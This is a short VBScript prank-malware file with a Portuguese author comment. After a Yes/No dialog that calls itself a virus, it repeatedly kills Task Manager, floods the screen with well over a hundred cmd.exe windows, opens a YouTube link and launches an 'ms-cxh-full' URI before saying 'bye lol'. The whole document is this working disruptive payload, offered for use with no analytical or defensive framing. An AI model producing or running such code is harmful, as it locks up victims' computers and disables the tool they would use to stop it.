'Eu sei q o loop ta mal feito, mas ta feito pra ir executando tudo de vez e não ficar demorando q nem o loop normal

Set WshShell = wscript.createobject("wscript.shell")
Dim opcao
opcao = msgbox ("The file you want to run is a VIRUS (MALWARE) and can damage your RAM or any other part of your computer! I am not responsible for your actions, do you really want to run this file?",VbYesNo)
If opcao = VbYes Then
WshShell.Run "taskkill /im taskmgr.exe", , True
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.Run "taskkill /im taskmgr.exe", , True
wscript.sleep (1000)
WshShell.Run "taskkill /im cmd.exe", , True
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.Run "taskkill /im taskmgr.exe", , True
wscript.sleep (1000)
WshShell.Run "taskkill /im cmd.exe", , True
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.Run "taskkill /im taskmgr.exe", , True
wscript.sleep (1000)
WshShell.Run "taskkill /im cmd.exe", , True
WshShell.Run "taskkill /im taskmgr.exe", , True

wscript.sleep (20000)
WshShell.Run "taskkill /im taskmgr.exe", , True

WshShell.run "https://youtu.be/cUo7oMhD2hw"
WshShell.Run "taskkill /im taskmgr.exe", , True

wscript.sleep (5000)
WshShell.Run "taskkill /im taskmgr.exe", , True
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "cmd.exe"
WshShell.run "ms-cxh-full://fodasse"
msgbox "bye lol"

Else
msgbox "you choose no."
End If
